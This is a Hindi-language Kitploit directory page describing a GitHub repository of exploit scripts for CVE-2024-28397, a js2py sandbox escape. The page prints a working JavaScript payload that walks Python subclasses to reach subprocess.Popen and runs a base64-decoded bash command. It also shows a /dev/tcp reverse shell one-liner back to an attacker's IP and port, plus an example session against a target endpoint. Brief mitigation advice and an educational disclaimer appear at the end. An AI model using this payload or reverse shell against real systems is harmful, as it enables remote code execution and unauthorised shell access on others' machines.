Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
js2py-Sandbox-Escape-CVE-2024-28397-RCE — CVE-2024-28397 के लिए एक्सप्लॉइट स्क्रिप्ट्स, जो एक js2py सैंडबॉक्स एस्केप है जो लक्षित एंडपॉइंट पर रिवर्स शेल उत्पन्न करने के लिए मनमाना Python कोड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/0xdtc/js2py-sandbox-escape-cve-2024-28397-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHub0xdtc/js2py-sandbox-escape-cve-2024-28397-rce

js2py-Sandbox-Escape-CVE-2024-28397-RCE

CVE-2024-28397 के लिए एक्सप्लॉइट स्क्रिप्ट्स, जो एक js2py सैंडबॉक्स एस्केप है जो लक्षित एंडपॉइंट पर रिवर्स शेल उत्पन्न करने के लिए मनमाना Python कोड निष्पादित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
350 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-28397 js2py सैंडबॉक्स एस्केप एक्सप्लॉइट

js2py सैंडबॉक्स एस्केप भेद्यता (CVE-2024-28397) को लक्षित करने वाले एक्सप्लॉइट स्क्रिप्ट का संग्रह, जो Python ऑब्जेक्ट इंट्रोस्पेक्शन के माध्यम से मनमाना कोड निष्पादन की अनुमति देता है।

🔍 भेद्यता अवलोकन

js2py लाइब्रेरी में एक महत्वपूर्ण सैंडबॉक्स एस्केप भेद्यता है जो हमलावरों को JavaScript के Object.getOwnPropertyNames() विधि के माध्यम से आंतरिक Python ऑब्जेक्ट्स तक पहुँचकर मनमाना Python कोड निष्पादित करने की अनुमति देती है।

तकनीकी विवरण

  • CVE ID: CVE-2024-28397
  • प्रभावित लाइब्रेरी: js2py (JavaScript से Python अनुवादक)
  • हमला वेक्टर: Python ऑब्जेक्ट इंट्रोस्पेक्शन के माध्यम से सैंडबॉक्स एस्केप
  • प्रभाव: रिमोट कोड निष्पादन (RCE)

📋 संदर्भ विश्लेषण

यह एक्सप्लॉइट Marven11 के व्यापक विश्लेषण पर आधारित है:

  • विश्लेषण दस्तावेज़: CVE-2024-28397 js2py सैंडबॉक्स एस्केप विश्लेषण

🛠️ एक्सप्लॉइट स्क्रिप्ट्स

इस रिपॉजिटरी में तीन अलग-अलग कार्यान्वयन हैं:

1. बैश स्क्रिप्ट (exploit.sh)

curl और jq का उपयोग करते हुए हल्का बैश कार्यान्वयन।

2. गो स्क्रिप्ट (exploit.go)

अंतर्निहित HTTP क्लाइंट के साथ क्रॉस-प्लेटफ़ॉर्म गो कार्यान्वयन।

🚀 त्वरित प्रारंभ

पूर्वापेक्षाएँ

  • बैश स्क्रिप्ट के लिए: curl, jq, base64
  • गो स्क्रिप्ट के लिए: Go 1.16+

उपयोग

सभी स्क्रिप्ट इंटरैक्टिव हैं और आवश्यक जानकारी के लिए संकेत देंगी:

root@kitploit:~
# Bash version
chmod +x exploit.sh
./exploit.sh

# Go version
go run exploit.go

इंटरैक्टिव प्रॉम्प्ट

प्रत्येक स्क्रिप्ट पूछेगी:

  1. लक्ष्य URL: भेद्य js2py कोड चलाने वाला एंडपॉइंट
  2. आपका IP: रिवर्स शेल के लिए आपकी मशीन का IP पता
  3. आपका पोर्ट: रिवर्स शेल कनेक्शन के लिए पोर्ट नंबर

उदाहरण सत्र

root@kitploit:~
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}

🎯 यह कैसे काम करता है

1. पेलोड उत्पादन

एक्सप्लॉइट गतिशील रूप से एक रिवर्स शेल कमांड बनाता है:

root@kitploit:~
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1

2. Base64 एन्कोडिंग

शेल कमांड सुरक्षित ट्रांसमिशन के लिए base64-एन्कोडेड है:

root@kitploit:~
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)

3. JavaScript सैंडबॉक्स एस्केप

मुख्य एक्सप्लॉइट Python के आंतरिक ऑब्जेक्ट्स तक पहुँचने के लिए JavaScript का उपयोग करता है:

root@kitploit:~
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if(item.__name__ != "type") {
            let result = findpopen(item);
            if(result) return result;
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();

4. निष्पादन प्रवाह

  1. Object.getOwnPropertyNames({}) के माध्यम से Python की ऑब्जेक्ट प्रणाली तक पहुँचें
  2. __class__.__base__.__getattribute__ के माध्यम से आधार वर्गों पर नेविगेट करें
  3. subprocess.Popen के लिए उपवर्गों की खोज करें
  4. Popen के माध्यम से मनमाना सिस्टम कमांड निष्पादित करें

🛡️ शमन

  • js2py को पैच किए गए संस्करण में अपडेट करें
  • उचित इनपुट सत्यापन और स्वच्छता लागू करें
  • सुरक्षित सैंडबॉक्सिंग विकल्पों का उपयोग करें
  • गहराई में रक्षा सुरक्षा उपाय लागू करें

📚 शैक्षिक उद्देश्य

ये स्क्रिप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान की गई हैं। किसी भी सिस्टम के विरुद्ध परीक्षण करने से पहले हमेशा उचित प्राधिकरण सुनिश्चित करें।

🔗 संदर्भ

  • CVE-2024-28397 आधिकारिक प्रविष्टि
  • Marven11 का विस्तृत विश्लेषण
  • js2py GitHub रिपॉजिटरी

⚖️ अस्वीकरण

यह सॉफ्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता लागू कानूनों का पालन करने और उपयोग से पहले उचित प्राधिकरण प्राप्त करने के लिए जिम्मेदार हैं।

टूल डाउनलोड करें